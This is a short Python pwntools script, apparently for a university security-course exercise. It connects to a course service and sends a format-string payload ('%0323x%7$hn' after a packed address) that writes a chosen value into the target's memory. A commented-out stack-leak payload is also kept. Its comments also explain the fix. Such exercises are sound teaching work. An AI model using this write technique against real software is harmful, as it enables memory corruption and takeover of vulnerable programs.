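# Client for the "04_match_value" exercise: connects to the course service,
# sends a single format-string payload and echoes whatever the service replies.
#
# Defensive reading: the payload only has an effect if the service passes
# user-controlled bytes to printf as the *format* argument. Calling
# printf("%s", buf) instead removes the bug class, and building with
# -Wformat -Wformat-security reports such call sites at compile time.
from pwn import remote, process, p32

HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25194

conn = remote(HOST, PORT)
# Local alternative to the remote service (this is why `process` is imported).
#conn = process("04_match_value")
#input()

# 32-bit little-endian encoding of the address the payload refers to.
tgt_addr = p32(0x804c040)

#327 - 4(ptr) = 323
# The 4 address bytes at the front of the payload are already counted as
# output when %hn is reached, so the zero-padded field is 323 wide to bring
# the running count to 327. %hn stores that count as a 16-bit value through
# the 7th printf argument.
# NOTE(review): 327 is presumably the value the exercise compares against, and
# argument 7 presumably aliases the start of this buffer -- confirm against
# the target binary.
pl = tgt_addr + b"%0323x%7$hn\n"
# Earlier payload kept by the author, left disabled.
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"

conn.send(pl)

# Echo the reply one byte at a time so partial output shows up immediately.
try:
    while conn.connected():
        chunk = conn.recv(1)
        if not chunk:
            # recv() can return b"" on timeout; indexing it would raise
            # IndexError, so wait for the next byte instead.
            continue
        print(chr(chunk[0]), end="", flush=True)
except EOFError:
    # pwntools raises EOFError when the peer closes the connection; that is
    # the normal end of the session, not a failure.
    pass
finally:
    conn.close()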